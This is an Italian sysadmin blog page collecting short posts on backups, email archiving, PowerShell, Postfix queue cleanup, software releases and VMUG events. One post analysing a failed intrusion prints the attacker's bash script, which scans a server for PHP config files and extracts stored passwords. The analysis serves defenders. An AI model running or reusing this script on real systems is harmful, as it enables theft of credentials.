SIAMO GEEK

Categoria: SysAdmin

  • Qual è lo scopo del backup?

    Ovviamente è il restore, ma non tutti sembrano mettere in pratica davvero questa regola.

    La maggior parte delle persone (dall’utente casalingo al SysAdmin) si preoccupa del backup, ovvero dell’efficienza e (ammettiamolo) dell’estetica delle procedure di backup, tralasciando completamente la parte di restore.

    Quando l’ambiente funziona a dovere, il restore è semplice; se l’utente cancella un singolo documento di Word ci sono i wizard, le interfacce grafiche, gli automatismi, le protezioni, i manuali online…

    Ma se il danno è più grave o più esteso?

    (altro…)

  • Archiviazione della posta elettronica

    È fuori discussione che l’archiviazione della posta elettronica sia una necessità e, alcune volte, un obbligo.

    Il SysAdmin deve risolvere in un modo o in un altro questa necessità degli utenti, senza decidere ex auctoritate che si tratta di un vezzo o della conseguenza della pigrizia di chi utilizza la mail. Nella posta elettronica ci sono le tracce con riferimenti temporali delle interazioni con clienti o fornitori esterni e alcune volte c’è la storia evolutiva di un’organizzazione.

    (altro…)

  • PowerShell: tre comandi utili

    La PowerShell di Windows è un tool molto potente, probabilmente guardato con sospetto perché realizzata da Microsoft.

    Il problema è, che, in stile Microsoft, vuole ridefinire gli standard esistenti, quando invece prende un po’ qui e un po’ là e mette tutto assieme.

    Ciononostante, resta un interprete molto potente che il SysAdmin finestrato non deve trascurare o sottovalutare, come mostrano questi tre esempi.

    • Elenco dei servizi in ordine di stato:
      Get-service * | sort Status
    • Elenco dei processi attivi raggruppati per produttore del software:
      Get-Process | sort company | format-Table ProcessName -groupby company
    • Elenco del software installato, con relativa command line di disinstallazione:
      gp HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |Select DisplayName, DisplayVersion, Publisher, InstallDate, HelpLink, UninstallString

  • Postfix: snellire la coda

    Chi gestisce degli MTA ha ben presente il problema dello spam.

    Tra gli effetti collaterali di questo fenomeno ci sono elle code di mail che si riempiono di messaggi inutili. Questo avviene secondo uno scenario tipico: lo spammer invia un messaggio con un mittente farlocco ad un utente che non esiste; il nostro MTA genera diligentemente un NDR e tenta di recapitarlo al presunto mittente del messaggio, ma l’MTA di destinazione rifiuta la connessione, non è raggiungibile o il recapito dà un errore temporaneo (4xx). Risultato: rimangono in coda per dei giorni dei messaggi di nessuna utilità che non fanno altro che sprecare (pochissima) banda e falsare un dato che potrebbe essere utile come sintomo di problemi (il numero dei messaggi non recapitati in coda).

    Questo è un tipico esempio dello scenario descritto sopra:

    $ mailq
----Queue ID----- --Size-- ---Arrival Time---- --Sender/Recipient------
3Vgspm0WfDz30Dy       3152 Mon Apr 30 06:14:56 MAILER-DAEMON
   (connect to h1784190.stratoserver.net[85.214.66.15]:25: Connection refused)
                                               root@h1784190.stratoserver.net

    Si tratta, quindi, di togliere di mezzo i messaggi in coda provenienti da MAILER-DAEMON, a questo scopo basta eseguire questo comando:

    mailq | grep MAILER-DAEMON | awk '{print substr($1,1,16)}' | postsuper -d -

    La dimensione dell’ID è quella di Postfix >= 2.9 con enable_long_queue_ids abilitato. Viene considerato un carattere in più per fare in modo di non cancellare messaggi attivi (‘*’ dopo l’ID) o in hold (‘!’ dopo l’ID).

  • Analisi di un tentativo di compromissione

    Analizzare i tentativi di attacco dei server è sempre un’esperienza istruttiva per il SysAdmin.

    Questa notte ho analizzato il tentativo di attacco, abortito per varie ragioni tra cui avere il sistema aggiornato, al server web di un cliente.

    L’attaccante ha sfruttato una vulnerabilità di un vecchio script dimenticato per caricare alcuni file, ma poi non è riuscito ad andare molto più in là.

    Uno di questi file è uno script shell bash che fa una cosa interessante:

    count=0
blankLine=" "
find / -name "*conf*.php" >> PATHS 2> /dev/null
TOTAL=`grep -c . PATHS`
for i in `cat PATHS`;
do
grep -i pass $i > tmp
perl -wne'while(/\x27(.+?)\x27/g){print "$1\n"}' tmp >> pass.tmp
perl -wne'while(/\x22(.+?)\x22/g){print "$1\n"}' tmp >> parole.tmp
count=$[count + 1]
echo -n -e " \r$blankLine\r "
echo -n -e " $count - $TOTAL "
done

    Traducendo in italiano, lo script cerca tutti i file PHP il cui nome contiene conf e poi cerca di estrarre le password registrate in quei file.

  • Flash: aggiornamento con aggiornamento automatico

    Oramai gli aggiornamenti di Flash player non fanno più notizia, ma per gli utenti Windows c’è una novità.

    Dalla versione 11.2, la versione del player per Windows contiene un sistema di aggiornamento automatico. La prima volta che si installa una versione del software che include questa feature appare una schermata come questa:

    Per default viene attivato l’aggiornamento automatico del player.

    Chi non ha problemi di altro tipo dovrebbe lasciare il default e permettere al software di aggiornarsi automaticamente, in quanto le vulnerabilità di Flash sono sfruttate da molti malware.

  • Meeting del 4 aprile del VMUGIT a Sirmione

    Questa è l’agenda del meeting che VMUGIT che si terrà il prossimo mercoledì 4 aprile.

    L’ingresso è gratuito, l’iscrizione all’evento può essere fatta qui.

    Compresi nell’evento ci saranno un intervento di Steve Herrod, i buffet, un’estrazione a premi e un intervento del sottoscritto, più di cosi cosa volete?!

    • 09:00-09:30 Registrazioni
    • 09:30-09:35 Benvenuto/Agenda
    • 09:35-10:15 Il futuro dello storage VMware – Enrico Signoretti
    • 10:15-11:05 Ospite d’onore Steve Herrod, VMware CTO “Technical updates from VMware”
    • 11:50-11:20 Coffee Break
    • 11:20-11:30 Introduzione alla sicurezza – Luca Dell’Oca
    • 11:30-13:00 Tavola Rotonda – Soluzioni di sicurezza in ambienti vSphere
    • 13:00-14:30 Pranzo e brainstorming
    • 14:30-15:15 Virtualizzazione applicata al segmento SMB – Andrea Mauro e Luigi Rosa
    • 15:15-16:00 SSD e Virtualizzazione: Matrimonio in Paradiso – Fabio Rapposelli
    • 16:00-18:00 Estrazione Premi/Networking/Aperitivo

    Questi sono i premi che verranno estratti alla fine dell’evento:

    • due copie autografate da Duncan Epping e Frank Denneman del loro libro VMware vSphere 5 Clustering Technical Deepdive
    • due copie del libro di Scott Lowe Mastering VMware vSphere 5
    • due copie del libro di Mike Laverick Administering VMware Site Recovery Manager 5.0
    • cinque copie di Trend Micro Titanium Antivirus plus con un anno di abbonamento
    • due copie di Norton Internet Security 2012
    • due copie Norton 360 v.6

    Per maggiori informazioni sull’evento, vedere anche:

  • CentOS 5.8

    È stata rilasciata la versione 5.8 di CentOS.

    L’aggiornamento da qualsiasi versione 5.x può essere fatto eseguendo il comando yum update, non è necessario scaricare i media di installazione.

    Come nella versione precedente, i DVD di installazione sono ora due e il secondo contiene solamente i language pack di OpenOffice. Si può tranquillamente utilizzare un solo DVD e installare i language pack in seguito.

    Sono stati aggiunti questi pacchetti: binutils220, iotop, mysql-connector-odbc64, pixman, postgresql-odbc64, python-ctypes, spice-client, spice-protocol, virt-who e unixODBC64.

    L’elenco dei pacchetti aggiornati e tutte le altre informazioni sono disponibili nelle note di rilascio.

    Le immagini ISO sono disponibili; per il download è sempre consigliabile utilizzare i torrent.

  • Windows 8

    Ho scaricato e installato in un VM di VMware Workstation la Consumer Preview a 64 bit di Windows 8.

    La fase iniziale di setup è praticamente uguale a Windows 7, ma alla fine iniziano le sorprese che fanno capire il taglio di questa nuova release.

    Quando viene richiesto il nome dell’utente del computer, l’opzione predefinita è quella di utilizzare un account Microsoft; si può, ovviamente, scegliere di utilizzare un account locale, ma alcune funzioni, non fondamentali specialmente in contesti aziendali, richiedono un account Microsoft per poter essere utilizzate. Si può comunque creare o collegare un account Microsoft anche dopo l’installazione.

    (altro…)

  • Nginx sorpassa MS IIS

    Secondo Netcraft all’inizio del 2012 Nginx ha sopravanzato IIS  nella classifica dei siti attivi.

    E’ solo un primo sorpasso in quanto nelle altre classifiche (Top Server /Top Servers Across the Million Busiest Sites) il webserver di Microsoft mantiene momentaneamente il secondo posto dietro all’ottimo Apache.

    Ma è solo questione di tempo in quanto il trend di crescita di Nginx lascia ben sperare…

    Per chi non conoscesse Nginx si tratta di un webserver opensource ad altissime prestazioni.

    Rilasciato nel 2004 è cresciuto costantemente. Attualmente è l’unico prodotto di questa categoria ad avere un trend di crescita positivo.

    E’ utilizzato da numerosi siti ad alto traffico tra i quali  WordPress,  Github,  SourceForge.

  • Apache server 2.4.1

    E’ uscita l’attesa major release (2.4.1) del più diffuso webserver al mondo.

    Potete leggere qui in dettaglio le numerose novità introdotte dalla nuova versione.

    Si notano ottimizzazioni delle prestazioni (p. es minor uso della memoria) nuove direttive per la configurazione e una quantità non indifferente di nuovi moduli oltre che miglioramenti per quelli già presenti nelle versioni precedenti.

  • Incontro del VMUG IT di aprile

    Finalmente è arrivato il momento di svelare la sorpresa che il VMUG IT ha preparato per il prossimo meeting.

    Innanzi tutto, un po’ di informazioni.

    Il primo meeting VMUG IT del 2012 si terrà il 4 aprile a Sirmione (BS), presso il Grand Hotel delle Terme, proprio di fronte alla Rocca Scaligera.

    Il focus dell’evento sarà sul tema virtual security, con interventi su tecnologie specifiche di questo ambito.

    (altro…)